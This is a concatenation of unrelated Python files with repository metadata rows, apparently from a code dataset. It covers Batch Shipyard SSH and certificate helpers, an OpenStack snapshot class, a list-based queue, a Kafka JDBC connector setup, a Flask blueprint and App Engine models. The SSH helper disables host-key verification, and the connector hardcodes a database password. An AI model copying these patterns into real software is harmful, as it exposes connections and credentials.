def IsPrefixLeDecoder(prefix, decoder, name_fcn):
"""Returns true if the prefix is less than or equal to the
corresponding prefix length of the decoder name."""
decoder_name = name_fcn(decoder)
prefix_len = len(prefix)
decoder_len = len(decoder_name)
decoder_prefix = (decoder_name[0:prefix_len]
if prefix_len < decoder_len
else decoder_name)
return prefix <= decoder_prefix
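# Usage sketch (file names are illustrative, not taken from the generator):
#   ifdef_name('gen/arm32_decode.h')                -> 'GEN_ARM32_DECODE_H_'
#   GetNumberCodeBlocks(['M', 'S'])                 -> 3
#   FindBlockIndex('decode_2.h', 'decode_%d.h', 3)  -> 2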
| 31.298851 | 76 | 0.693353 | 386 | 2,723 | 4.772021 | 0.373057 | 0.043974 | 0.022801 | 0.023887 | 0.12595 | 0.12595 | 0.12595 | 0.12595 | 0.12595 | 0.12595 | 0 | 0.008756 | 0.203085 | 2,723 | 86 | 77 | 31.662791 | 0.840092 | 0.319868 | 0 | 0.06383 | 0 | 0 | 0.194604 | 0.013777 | 0 | 0 | 0 | 0.011628 | 0.042553 | 1 | 0.12766 | false | 0 | 0 | 0 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ac98e5cdb6676a542021f48c116aa5fa733e705
| 16,208 |
py
|
Python
|
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# compat imports
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input,
next, oct, open, pow, round, super, filter, map, zip)
# stdlib imports
import base64
import collections
import getpass
import logging
import os
try:
import pathlib2 as pathlib
except ImportError:
import pathlib
import tempfile
import stat
import subprocess
# local imports
from . import settings
from . import util
# create logger
logger = logging.getLogger(__name__)
util.setup_logger(logger)
# global defines
_SSH_KEY_PREFIX = 'id_rsa_shipyard'
_REMOTEFS_SSH_KEY_PREFIX = '{}_remotefs'.format(_SSH_KEY_PREFIX)
# named tuples
PfxSettings = collections.namedtuple(
'PfxSettings', ['filename', 'passphrase', 'sha1'])
def get_ssh_key_prefix():
# type: (None) -> str
"""Get SSH key prefix
:rtype: str
:return: ssh key prefix
"""
return _SSH_KEY_PREFIX
def get_remotefs_ssh_key_prefix():
# type: (None) -> str
"""Get remote fs SSH key prefix
:rtype: str
:return: ssh key prefix for remote fs
"""
return _REMOTEFS_SSH_KEY_PREFIX
def generate_rdp_password():
# type: (None) -> str
"""Generate an RDP password
:rtype: str
:return: rdp password
"""
    return base64.b64encode(os.urandom(8)).decode('ascii')  # str, not bytes
def generate_ssh_keypair(export_path, prefix=None):
# type: (str, str) -> tuple
"""Generate an ssh keypair for use with user logins
:param str export_path: keypair export path
:param str prefix: key prefix
:rtype: tuple
:return: (private key filename, public key filename)
"""
if util.is_none_or_empty(prefix):
prefix = _SSH_KEY_PREFIX
privkey = pathlib.Path(export_path, prefix)
pubkey = pathlib.Path(export_path, prefix + '.pub')
if privkey.exists():
old = pathlib.Path(export_path, prefix + '.old')
if old.exists():
old.unlink()
privkey.rename(old)
if pubkey.exists():
old = pathlib.Path(export_path, prefix + '.pub.old')
if old.exists():
old.unlink()
pubkey.rename(old)
logger.info('generating ssh key pair to path: {}'.format(export_path))
    subprocess.check_call(
        ['ssh-keygen', '-f', str(privkey), '-t', 'rsa', '-N', ''])
return (privkey, pubkey)
def check_ssh_private_key_filemode(ssh_private_key):
# type: (pathlib.Path) -> bool
"""Check SSH private key filemode
:param pathlib.Path ssh_private_key: SSH private key
:rtype: bool
:return: private key filemode is ok
"""
def _mode_check(fstat, flag):
return bool(fstat & flag)
if util.on_windows():
return True
fstat = ssh_private_key.stat().st_mode
modes = frozenset((stat.S_IRWXG, stat.S_IRWXO))
return not any([_mode_check(fstat, x) for x in modes])
def connect_or_exec_ssh_command(
remote_ip, remote_port, ssh_private_key, username, sync=True,
shell=False, tty=False, ssh_args=None, command=None):
    # type: (str, int, pathlib.Path, str, bool, bool, bool, tuple,
    #        tuple) -> int or subprocess.Popen
"""Connect to node via SSH or execute SSH command
:param str remote_ip: remote ip address
:param int remote_port: remote port
:param pathlib.Path ssh_private_key: SSH private key
:param str username: username
:param bool sync: synchronous execution
:param bool shell: execute with shell
:param bool tty: allocate pseudo-tty
:param tuple ssh_args: ssh args
:param tuple command: command
    :rtype: int or subprocess.Popen
:return: return code or subprocess handle
"""
if not ssh_private_key.exists():
raise RuntimeError('SSH private key file not found at: {}'.format(
ssh_private_key))
# ensure file mode is set properly for the private key
if not check_ssh_private_key_filemode(ssh_private_key):
logger.warning(
'SSH private key filemode is too permissive: {}'.format(
ssh_private_key))
# execute SSH command
ssh_cmd = [
'ssh', '-o', 'StrictHostKeyChecking=no',
'-o', 'UserKnownHostsFile={}'.format(os.devnull),
'-i', str(ssh_private_key), '-p', str(remote_port),
]
if tty:
ssh_cmd.append('-t')
if util.is_not_empty(ssh_args):
ssh_cmd.extend(ssh_args)
ssh_cmd.append('{}@{}'.format(username, remote_ip))
if util.is_not_empty(command):
ssh_cmd.extend(command)
logger.info('{} node {}:{} with key {}'.format(
'connecting to' if util.is_none_or_empty(command)
else 'executing command on', remote_ip, remote_port, ssh_private_key))
if sync:
return util.subprocess_with_output(ssh_cmd, shell=shell)
else:
return util.subprocess_nowait_pipe_stdout(
ssh_cmd, shell=shell, pipe_stderr=True)
def derive_private_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a private key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def derive_public_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a public key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', pemfile, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def _parse_sha1_thumbprint_openssl(output):
# type: (str) -> str
"""Get SHA1 thumbprint from buffer
:param str buffer: buffer to parse
:rtype: str
:return: sha1 thumbprint of buffer
"""
# return just thumbprint (without colons) from the above openssl command
# in lowercase. Expected openssl output is in the form:
# SHA1 Fingerprint=<thumbprint>
return ''.join(util.decode_string(
output).strip().split('=')[1].split(':')).lower()
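# For example (illustrative input): given the openssl output line
# 'SHA1 Fingerprint=DE:AD:BE:EF', this helper returns 'deadbeef'.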
def get_sha1_thumbprint_pfx(pfxfile, passphrase):
# type: (str, str) -> str
"""Get SHA1 thumbprint of PFX
:param str pfxfile: name of the pfx file to export
:param str passphrase: passphrase for pfx
:rtype: str
:return: sha1 thumbprint of pfx
"""
if pfxfile is None:
raise ValueError('pfxfile is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# compute sha1 thumbprint of pfx
pfxdump = subprocess.check_output(
['openssl', 'pkcs12', '-in', pfxfile, '-nodes', '-passin',
'pass:' + passphrase]
)
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate(input=pfxdump)[0])
def get_sha1_thumbprint_pem(pemfile):
# type: (str) -> str
"""Get SHA1 thumbprint of PEM
    :param str pemfile: name of the pem file
:rtype: str
:return: sha1 thumbprint of pem
"""
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint', '-in', pemfile],
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate()[0])
def generate_pem_pfx_certificates(config):
# type: (dict) -> str
"""Generate a pem and a derived pfx file
:param dict config: configuration dict
:rtype: str
:return: sha1 thumbprint of pfx
"""
# gather input
pemfile = settings.batch_shipyard_encryption_public_key_pem(config)
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
if pemfile is None:
pemfile = util.get_input('Enter public key PEM filename to create: ')
if pfxfile is None:
pfxfile = util.get_input('Enter PFX filename to create: ')
if passphrase is None:
while util.is_none_or_empty(passphrase):
passphrase = getpass.getpass('Enter password for PFX: ')
if len(passphrase) == 0:
print('passphrase cannot be empty')
privatekey = pemfile + '.key'
# generate pem file with private key and no password
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
try:
subprocess.check_call(
['openssl', 'req', '-new', '-nodes', '-x509', '-newkey',
'rsa:2048', '-keyout', privatekey, '-out', f.name, '-days', '730',
'-subj', '/C=US/ST=None/L=None/O=None/CN=BatchShipyard']
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', privatekey, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
logger.debug('created public key PEM file: {}'.format(pemfile))
# convert pem to pfx for Azure Batch service
subprocess.check_call(
['openssl', 'pkcs12', '-export', '-out', pfxfile, '-inkey',
privatekey, '-in', f.name, '-certfile', f.name,
'-passin', 'pass:', '-passout', 'pass:' + passphrase]
)
logger.debug('created PFX file: {}'.format(pfxfile))
finally:
# remove rsa private key file
fp = pathlib.Path(privatekey)
if fp.exists():
fp.unlink()
# remove temp cert pem
fp = pathlib.Path(f.name)
if fp.exists():
fp.unlink()
# get sha1 thumbprint of pfx
return get_sha1_thumbprint_pfx(pfxfile, passphrase)
def get_encryption_pfx_settings(config):
# type: (dict) -> tuple
"""Get PFX encryption settings from configuration
:param dict config: configuration settings
:rtype: tuple
:return: pfxfile, passphrase, sha1 tp
"""
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
sha1_cert_tp = settings.batch_shipyard_encryption_pfx_sha1_thumbprint(
config)
# manually get thumbprint of pfx if not exists in config
if util.is_none_or_empty(sha1_cert_tp):
if pfx_passphrase is None:
pfx_passphrase = getpass.getpass('Enter password for PFX: ')
sha1_cert_tp = get_sha1_thumbprint_pfx(pfxfile, pfx_passphrase)
settings.set_batch_shipyard_encryption_pfx_sha1_thumbprint(
config, sha1_cert_tp)
return PfxSettings(
filename=pfxfile, passphrase=pfx_passphrase, sha1=sha1_cert_tp)
def _rsa_encrypt_string(data, config):
# type: (str, dict) -> str
"""RSA encrypt a string
:param str data: clear text data to encrypt
:param dict config: configuration dict
:rtype: str
:return: base64-encoded cipher text
"""
if util.is_none_or_empty(data):
raise ValueError('invalid data to encrypt')
inkey = settings.batch_shipyard_encryption_public_key_pem(config)
derived = False
if inkey is None:
# derive pem from pfx
derived = True
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(
config)
inkey = derive_public_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
try:
if inkey is None:
raise RuntimeError('public encryption key is invalid')
proc = subprocess.Popen(
['openssl', 'rsautl', '-encrypt', '-pubin', '-inkey', inkey],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
ciphertext = util.base64_encode_string(
proc.communicate(input=util.encode_string(data))[0])
if proc.returncode != 0:
raise RuntimeError(
'openssl encryption failed with returncode: {}'.format(
proc.returncode))
return ciphertext
finally:
if derived:
fp = pathlib.Path(inkey)
if fp.exists():
fp.unlink()
def _rsa_decrypt_string_with_pfx(ciphertext, config):
# type: (str, dict) -> str
"""RSA decrypt a string
:param str ciphertext: cipher text in base64
:param dict config: configuration dict
:rtype: str
:return: decrypted cipher text
"""
if util.is_none_or_empty(ciphertext):
raise ValueError('invalid ciphertext to decrypt')
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
pemfile = derive_private_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
if pemfile is None:
raise RuntimeError('cannot decrypt without valid private key')
cleartext = None
try:
data = util.base64_decode_string(ciphertext)
proc = subprocess.Popen(
['openssl', 'rsautl', '-decrypt', '-inkey', pemfile],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cleartext = proc.communicate(input=data)[0]
finally:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
return cleartext
def encrypt_string(enabled, string, config):
# type: (bool, str, dict) -> str
"""Encrypt a string
:param bool enabled: if encryption is enabled
:param str string: string to encrypt
:param dict config: configuration dict
:rtype: str
:return: encrypted string if enabled
"""
if enabled:
return _rsa_encrypt_string(string, config)
else:
return string
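# Usage sketch (configuration contents assumed): with credential encryption
# enabled, a caller wraps a secret as
#
#     ciphertext = encrypt_string(True, 'my-secret', config)
#
# which RSA-encrypts via `openssl rsautl` against the configured public key
# and returns the result base64-encoded; _rsa_decrypt_string_with_pfx
# reverses it using the private key derived from the configured PFX.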
| 35.311547 | 79 | 0.653258 | 2,038 | 16,208 | 5.052012 | 0.185476 | 0.028166 | 0.022727 | 0.03312 | 0.41521 | 0.379856 | 0.32566 | 0.271465 | 0.221445 | 0.197358 | 0 | 0.006029 | 0.24272 | 16,208 | 458 | 80 | 35.388646 | 0.832817 | 0.296088 | 0 | 0.363636 | 0 | 0 | 0.120575 | 0.008142 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064394 | false | 0.125 | 0.060606 | 0.003788 | 0.200758 | 0.049242 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0acf1290742f590cb6015abc57d74458d907cabb
| 1,164 |
py
|
Python
|
soil/build/lib/soil/openstack/snapshot.py
|
JackDan9/soil
|
ae612a4634634aace834491fbdefbc69e6167674
|
[
"MIT"
] | 1 |
2020-08-06T11:58:35.000Z
|
2020-08-06T11:58:35.000Z
|
soil/build/lib/soil/openstack/snapshot.py
|
JackDan9/soil
|
ae612a4634634aace834491fbdefbc69e6167674
|
[
"MIT"
] | 4 |
2019-12-13T11:27:28.000Z
|
2022-02-27T11:58:38.000Z
|
soil/build/lib/soil/openstack/snapshot.py
|
JackDan9/soil
|
ae612a4634634aace834491fbdefbc69e6167674
|
[
"MIT"
] | null | null | null |
# Copyright 2020 Soil, Inc.
from soil.openstack.base import DataBase
from soil.openstack.base import SourceBase
class SnapshotData(DataBase):
"""A class for openstack snapshot data"""
def __init__(self, data):
self.data = data['snapshot']
class Snapshot(SourceBase):
"""A class for openstack snapshot"""
def __init__(self, plugin, source_id):
super(Snapshot, self).__init__(plugin, source_id)
self._snapshot_obj = None
@property
def snapshot_obj(self):
if self._snapshot_obj is not None:
return self._snapshot_obj
self._snapshot_obj = SnapshotData(self.show())
return self._snapshot_obj
def show(self):
return self.plugin.cinder.show_snapshot(self.source_id)
def delete(self):
self.plugin.cinder.delete_snapshot(self.source_id)
def is_created(self):
snapshot_info = self.show()
status = snapshot_info['snapshot']['status']
if status in ('available', ):
return True
self._check_failed_status(status)
return False
def is_delete(self):
pass
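# Usage sketch (the plugin object and id are assumed to come from the caller):
#
#     snap = Snapshot(plugin, snapshot_id)
#     if snap.is_created():
#         print(snap.snapshot_obj.data['status'])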
| 25.304348 | 63 | 0.636598 | 138 | 1,164 | 5.108696 | 0.311594 | 0.102128 | 0.106383 | 0.059574 | 0.215603 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0047 | 0.2689 | 1,164 | 45 | 64 | 25.866667 | 0.823737 | 0.079897 | 0 | 0.071429 | 0 | 0 | 0.029245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.035714 | 0.071429 | 0.035714 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0acf5c8efa495629dab15411d7c1138e6f73ca8f
| 1,417 |
py
|
Python
|
data_structures/queue/queue_on_pseudo_stack.py
|
hank-chou/python
|
a9f729fa263bce599d2774f3f6afb5a18bcc9862
|
[
"MIT"
] | 13 |
2021-03-11T00:25:22.000Z
|
2022-03-19T00:19:23.000Z
|
data_structures/queue/queue_on_pseudo_stack.py
|
hank-chou/python
|
a9f729fa263bce599d2774f3f6afb5a18bcc9862
|
[
"MIT"
] | 162 |
2021-03-09T01:52:11.000Z
|
2022-03-12T01:09:07.000Z
|
data_structures/queue/queue_on_pseudo_stack.py
|
hank-chou/python
|
a9f729fa263bce599d2774f3f6afb5a18bcc9862
|
[
"MIT"
] | 18 |
2020-02-09T13:00:11.000Z
|
2021-03-11T08:47:36.000Z
|
"""Queue represented by a pseudo stack (represented by a list with pop and append)"""
class Queue:
def __init__(self):
self.stack = []
self.length = 0
def __str__(self):
printed = "<" + str(self.stack)[1:-1] + ">"
return printed
"""Enqueues {@code item}
@param item
item to enqueue"""
def put(self, item):
self.stack.append(item)
self.length = self.length + 1
"""Dequeues {@code item}
@requirement: |self.length| > 0
@return dequeued
item that was dequeued"""
def get(self):
self.rotate(1)
dequeued = self.stack[self.length - 1]
self.stack = self.stack[:-1]
self.rotate(self.length - 1)
self.length = self.length - 1
return dequeued
"""Rotates the queue {@code rotation} times
@param rotation
number of times to rotate queue"""
def rotate(self, rotation):
for i in range(rotation):
temp = self.stack[0]
self.stack = self.stack[1:]
self.put(temp)
self.length = self.length - 1
"""Reports item at the front of self
@return item at front of self.stack"""
def front(self):
front = self.get()
self.put(front)
self.rotate(self.length - 1)
return front
"""Returns the length of this.stack"""
def size(self):
return self.length
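# Worked example (values are illustrative):
#
#     q = Queue()
#     for item in (1, 2, 3):
#         q.put(item)
#     q.get()    # returns 1, the front of the queue
#     q.front()  # returns 2 without removing it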
| 24.431034 | 85 | 0.562456 | 180 | 1,417 | 4.383333 | 0.288889 | 0.152091 | 0.08365 | 0.076046 | 0.186312 | 0.058302 | 0 | 0 | 0 | 0 | 0 | 0.014463 | 0.316867 | 1,417 | 57 | 86 | 24.859649 | 0.80062 | 0.055752 | 0 | 0.133333 | 0 | 0 | 0.002158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.233333 | false | 0 | 0 | 0.033333 | 0.4 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ad19b186920402498e9734534abe48d50e505b7
| 2,154 |
py
|
Python
|
src/producers/connector.py
|
cvelas31/public_transportation_streaming
|
903a1a147645e1b0783555db4bfc02098f7941ae
|
[
"MIT"
] | null | null | null |
src/producers/connector.py
|
cvelas31/public_transportation_streaming
|
903a1a147645e1b0783555db4bfc02098f7941ae
|
[
"MIT"
] | null | null | null |
src/producers/connector.py
|
cvelas31/public_transportation_streaming
|
903a1a147645e1b0783555db4bfc02098f7941ae
|
[
"MIT"
] | null | null | null |
"""Configures a Kafka Connector for Postgres Station data"""
import json
import logging
import requests
from settings import Settings
logger = logging.getLogger(__name__)
KAFKA_CONNECT_URL = f"{Settings.URLs.KAFKA_CONNECT_URL}/connectors"
CONNECTOR_NAME = "stations"
def configure_connector():
"""Starts and configures the Kafka Connect connector"""
logging.debug("Creating or updating kafka connect connector...")
resp = requests.get(f"{KAFKA_CONNECT_URL}/{CONNECTOR_NAME}")
if resp.status_code == 200:
logging.debug("Connector already created skipping recreation")
return
config = {
"connector.class": "io.confluent.connect.jdbc.JdbcSourceConnector",
"key.converter": "org.apache.kafka.connect.json.JsonConverter",
"key.converter.schemas.enable": "false",
"value.converter": "org.apache.kafka.connect.json.JsonConverter",
"value.converter.schemas.enable": "false",
"topic.prefix": "com.connect.transportation.",
"connection.url": "jdbc:postgresql://postgres:5432/cta",
"connection.user": "cta_admin",
"connection.password": "chicago",
"batch.max.rows": "500",
"table.whitelist": "stations",
"poll.interval.ms": "5000", # Poll every 5 seconds
"mode": "incrementing",
"incrementing.column.name": "stop_id",
}
    # The config above uses the JDBC Source Connector to connect to Postgres
    # and load the `stations` table in incrementing mode, with `stop_id` as
    # the incrementing column name. The topic prefix namespaces the resulting
    # topic, and the connector polls only every 5 seconds, since station
    # data changes infrequently.
data = json.dumps({"name": CONNECTOR_NAME, "config": config})
resp = requests.post(
KAFKA_CONNECT_URL,
headers={"Content-Type": "application/json"},
data=data,
)
# Ensure a healthy response was given
resp.raise_for_status()
logging.info("-------Connector created successfully-------")
if __name__ == "__main__":
configure_connector()
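# Verification sketch (host and port are assumptions; Kafka Connect's REST
# API exposes a per-connector status endpoint):
#
#     curl http://localhost:8083/connectors/stations/status
#
# should report the connector and its task as RUNNING once created.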
| 35.311475 | 98 | 0.679201 | 248 | 2,154 | 5.774194 | 0.532258 | 0.083799 | 0.041899 | 0.032123 | 0.065642 | 0.065642 | 0.065642 | 0 | 0 | 0 | 0 | 0.008656 | 0.19545 | 2,154 | 60 | 99 | 35.9 | 0.817657 | 0.243733 | 0 | 0 | 0 | 0 | 0.469603 | 0.220223 | 0 | 0 | 0 | 0.016667 | 0 | 1 | 0.025641 | false | 0.025641 | 0.102564 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ad4a301cbaa49708e90318cda5d0db992bcc1f1
| 354 |
py
|
Python
|
controllers/albums.py
|
jeonginlee/groove_scheduler
|
84e61834e940e2ff138ffeeea61fd301f3c2a244
|
[
"MIT"
] | null | null | null |
controllers/albums.py
|
jeonginlee/groove_scheduler
|
84e61834e940e2ff138ffeeea61fd301f3c2a244
|
[
"MIT"
] | null | null | null |
controllers/albums.py
|
jeonginlee/groove_scheduler
|
84e61834e940e2ff138ffeeea61fd301f3c2a244
|
[
"MIT"
] | null | null | null |
from flask import *
albums = Blueprint('albums', __name__, template_folder='templates')
@albums.route('/albums/edit')
def albums_edit_route():
options = {
"edit": True
}
return render_template("albums.html", **options)
@albums.route('/albums')
def albums_route():
options = {
"edit": False
}
return render_template("albums.html", **options)
| 19.666667 | 67 | 0.700565 | 42 | 354 | 5.666667 | 0.428571 | 0.138655 | 0.142857 | 0.218487 | 0.310924 | 0.310924 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129944 | 354 | 18 | 68 | 19.666667 | 0.772727 | 0 | 0 | 0.285714 | 0 | 0 | 0.180282 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.071429 | 0 | 0.357143 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ad6db55250893c680ef209759e33e069cabdd9a
| 4,292 |
py
|
Python
|
modules/stackoverflow/models.py
|
tjsavage/polymer-dashboard
|
19bc467f1206613f8eec646b6f2bc43cc319ef75
|
[
"CNRI-Python",
"Linux-OpenIB"
] | 1 |
2017-04-26T18:51:43.000Z
|
2017-04-26T18:51:43.000Z
|
modules/stackoverflow/models.py
|
tjsavage/polymer-dashboard
|
19bc467f1206613f8eec646b6f2bc43cc319ef75
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
modules/stackoverflow/models.py
|
tjsavage/polymer-dashboard
|
19bc467f1206613f8eec646b6f2bc43cc319ef75
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
import fix_path
import json
import datetime
from google.appengine.ext import ndb
# Taken from http://stackoverflow.com/questions/455580/json-datetime-between-python-and-javascript
dthandler = lambda obj: (
obj.isoformat()
if isinstance(obj, datetime.datetime)
or isinstance(obj, datetime.date)
else None
)
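# For example, dthandler(datetime.date(2017, 4, 26)) returns '2017-04-26',
# which json.dumps(..., default=dthandler) can then serialize.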
class StackOverflowSnapshot(ndb.Model):
"""Example Model"""
raw_timestamp = ndb.DateTimeProperty(required=True, auto_now_add=True)
requested_time = ndb.DateTimeProperty(required=True)
num_questions_by_tag = ndb.JsonProperty()
num_tagged_questions = ndb.IntegerProperty()
num_answered = ndb.IntegerProperty()
num_unanswered = ndb.IntegerProperty()
total_question_views = ndb.IntegerProperty()
status = ndb.StringProperty()
status_string = ndb.StringProperty()
def as_dict(self):
result = {}
result['requested_time'] = dthandler(self.requested_time)
result['num_tagged_questions'] = self.num_tagged_questions
result['num_questions_by_tag'] = self.num_questions_by_tag
result['num_answered'] = self.num_answered
result['num_unanswered'] = self.num_unanswered
result['total_question_views'] = self.total_question_views
result['status'] = self.status
result['status_string'] = self.status_string
return result
class StackOverflowQuestion(ndb.Model):
first_seen = ndb.DateTimeProperty(required=True, auto_now_add=True)
tags = ndb.StringProperty(repeated=True)
is_answered = ndb.BooleanProperty()
view_count = ndb.IntegerProperty()
answer_count = ndb.IntegerProperty()
url = ndb.StringProperty()
title = ndb.StringProperty()
creation_date = ndb.DateTimeProperty()
question_id = ndb.IntegerProperty()
def as_dict(self):
result = {}
result['first_seen'] = dthandler(self.first_seen)
result['tags'] = [t for t in self.tags]
result['is_answered'] = self.is_answered
result['view_count'] = self.view_count
result['answer_count'] = self.answer_count
result['url'] = self.url
result['title'] = self.title
result['creation_date'] = dthandler(self.creation_date)
result['question_id'] = self.question_id
return result
def update_to_stackexchange_question(self, stackexchange_question):
updated = False
if stackexchange_question.tags != self.tags:
self.tags = stackexchange_question.tags
updated = True
if stackexchange_question.json['is_answered'] != self.is_answered:
self.is_answered = stackexchange_question.json['is_answered']
updated = True
if stackexchange_question.view_count != self.view_count:
self.view_count = stackexchange_question.view_count
updated = True
if stackexchange_question.json['answer_count'] != self.answer_count:
self.answer_count = stackexchange_question.json['answer_count']
updated = True
if stackexchange_question.url != self.url:
self.url = stackexchange_question.url
updated = True
if stackexchange_question.title != self.title:
self.title = stackexchange_question.title
updated = True
if stackexchange_question.creation_date != self.creation_date:
self.creation_date = stackexchange_question.creation_date
updated = True
if stackexchange_question.json['question_id'] != self.question_id:
self.question_id = stackexchange_question.json['question_id']
updated = True
return updated
@classmethod
def from_stackexchange_question(cls, stackexchange_question):
result = cls(
tags = [t for t in stackexchange_question.tags],
is_answered = stackexchange_question.json['is_answered'],
view_count = stackexchange_question.view_count,
answer_count = stackexchange_question.json['answer_count'],
url = stackexchange_question.url,
title = stackexchange_question.title,
creation_date = stackexchange_question.creation_date,
question_id = stackexchange_question.json['question_id']
)
return result
